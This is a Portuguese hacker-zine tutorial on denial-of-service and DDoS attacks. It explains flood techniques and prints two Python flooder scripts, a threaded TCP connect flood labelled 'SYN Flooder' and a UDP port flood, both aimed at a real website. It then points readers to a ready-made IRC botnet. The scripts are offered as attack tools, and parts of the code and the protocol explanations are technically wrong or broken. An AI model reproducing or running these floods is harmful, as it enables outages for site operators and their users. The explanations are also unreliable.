  _____         _____                   _    _____  _____         _____
 |  __ \       / ____|                 | |  |  __ \|  __ \       / ____|
 | |  | | ___ | (___     __ _ _ __   __| |  | |  | | |  | | ___ | (___
 | |  | |/ _ \ \___ \   / _` | '_ \ / _` |  | |  | | |  | |/ _ \ \___ \
 | |__| | (_) |____) | | (_| | | | | (_| |  | |__| | |__| | (_) |____) |
 |_____/ \___/|_____/   \__,_|_| |_|\__,_|  |_____/|_____/ \___/|_____/

---------------------
 Author : Twi John
---------------------


// -----> Introdução <----- \\

Olá sou Twi John, nesse paper será falado sobre DOS e DDOS, falarei sobre tecnicas e mostrarei exemplos de tools para isso.
Tento explicar o funcionamento de cada um, para saber mais, entre em contato no IRC.

Quero falar que estou em uma "campanha" anti-ripper.. rsrs
"Se quizer participar bem, se num quizer amem! ou da o desce"

By Bispo Pedir MaisCedo



irc.irchighway.net  #Satanic_Bank
twijohn.blogspot.com
twijohn.hdfree.com.br
www.zona09.com


// -----> Definições <----- \\

Primeiro de tudo é necessario saber o que é para começar a saber o resto.

* Denial of Service ou DOS == (Negação de Serviço), isso acontece quando o serviço não pode responder a requisições, ou seja quando você conectar vai dar erro.

* Distributed Denial of Service ou DDOS == (Negação de Serviço Distribuido), ocorre da mesma maneira, no entando ao invez de um computador tentar causar DOS, varios computadores fazem isso, pode ocorrer de ser milhares de computadores.


// -----> DOS <----- \\

Pode ser causado por varias maneiras, estarei mostrando algumas maneiras de fazer isso.

* SYN FLOOD - SYN seria um tipo de pacote usado no TCP para se comunicar, ele funciona para pedir a conexão, por exemplo você se conecta ao servidor, você envia um pacote SYN e o servidor te envia a resposta para comunicar que chegou o pacote, enviando um pacote SYN-ACK e você recebendo isso responde novamente dizendo que recebeu esse pacote com um pacote ACK.
Agora se você enviar muitas requisições SYN para o servidor mais do que ele aguenta, ele não conseguirá responder sobrecarrendo-o e causando DOS.

#--------INICIO---------#

#!/usr/bin/python
#
# SYN Flooder
# Coded By Twi Johnj

import socket
from time import sleep
from thread import start_new_thread
from sys import exit

host = "www.google.com.br"
port = 80

def conn(a):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    sleep(10000)
    s.close()
    thread.exit()


number = 0
while(1):
    try:
        start_new_thread(conn,(None, ))
        sleep(0.1)
        number = number + 1
        print "Attack %s" % str(number)
    except socket.error:
        print ("System Timeout")
        exit(1)




#--------FIM---------#


* UDP Flood - Consiste em enviar diversos pacotes ICMP para o protocolo UDP, para isso pode-se usar IP Spoofing, ele envia diversos pacotes com endereços de IP falsos para varias portas UDP. O servidor irá responder para os IPs falsos, o computador que esta enviando os pacotes não receberá os pacotes, continuando com o mesmo ritimo. Além de spoofing você, se você tiver uma conexão maior do que o servidor, pode enviar os pacotes sem o Spoofing que com certeza causará DOS( isso pode ser feito nas outras tecnicas também ).

#--------INICIO---------#

#!/usr/bin/python
#
# UDP Flooder
# Coded By Twi Johnj

import socket
from sys import exit

host = "www.google.com.br"
buff = "LALALALALA666" * 1000


for ip in range(0,10000):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect((host, ip))
        s.send(buff)
        s.close()
        print "UDP Flooded port: %s" % ip
    except socket.error:
        s.close()
        print ("System Timeout")
        exit(1)


#--------FIM---------#

* TCP Flood - Ocorre como o UDP no entanto, o ataque é concentrado em uma unica porta, já que não há como conectar porque há o sistema de (three-way handshake).
Por ser o protocolo mais usado. Muitas é usado a exploração de falhas no servidor que causam DOS, isso acontece não por problemas na conexão mais sim no sistema que o servidor esta usando.
Um exemplo é um exploit em HTTP, que é usado em paginas de internet, se você causar DOS no Apache por exemplo, ele irá para de responder na porta 80 (HTTP), fazendo com que o site não funcione ate reeniciar o apache.


// Raw Socket - Você define o cabeçalho sendo TCP ou UDP, sendo assim você pode manipular os pacotes que irão enviar.




// -----> DDOS <----- \\


DDOS como já visto é um ataque usando varios computadores que são chamados de Botnet's, são manipulados remotamente por outro computador, fazendo com que todos os computadores façam o ataque junto.

* Botnet's geralmente, são controlados por IRC por ser facil de ser codado e dificilmente descoberto. Podem ser em diversas linguagens, existem os em linguagem web que infectam servidores da web, e também existem os que infectam computadores pessoais e redes que são os feitos em linguagens como C, perl, python. Você pode encontrar alguns botnet's na internet que é no caso o pbot feito em php, muito simples de configurar.